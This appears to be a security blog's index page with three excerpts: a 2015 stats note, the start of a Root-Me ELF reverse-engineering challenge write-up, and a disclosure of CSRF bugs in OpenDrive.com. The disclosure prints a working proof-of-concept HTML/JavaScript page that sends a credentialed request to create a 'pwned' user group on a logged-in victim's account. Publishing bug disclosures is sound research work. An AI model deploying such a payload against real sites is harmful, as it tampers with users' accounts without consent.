2015 in review

The WordPress.com stats helper monkeys prepared a 2015 annual report for this blog.

Here’s an excerpt:

Madison Square Garden can seat 20,000 people for a concert. This blog was viewed about 69,000 times in 2015. If it were a concert at Madison Square Garden, it would take about 3 sold-out performances for that many people to see it.

Click here to see the complete report.

Advertisements

Rootme No software breakpoints Cracking Challenge

Here is another very interesting challenge from Rootme. The title says ELF – no software breakpoints.

Let’s run the file command and see.

% file ch20.bin
ch20.bin: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped

The executable seemed to be striped.
Next I examined the sections in file and the .text section starts at 0x08048080

This is the disassembly of the text section. I spent some time trying to understand the logic. Well let’s see what this is 🙂
Continue reading

Pwning OpenDrive Users

After a long time being away from bug hunting I randomly found these few bugs in the OpenDrive.com website.

If the attacker can run this code while the user is logged in he can create his own Groups in the users section. This is the proof of concept and you will see groups such as “pwned” being created.

XSRF in Creating Groups

<html>
<!-- Discovered by @OsandaMalith-->
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https://www.opendrive.com/ajax", true);
        xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
        xhr.withCredentials = true;
        var body = "action=create-usergroup&group_name=pwned&group_max_storage=5120&group_bw_max=1024";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Click Here to Pwn" onclick="submitRequest();" />
    </form>
  </body>
</html>

Continue reading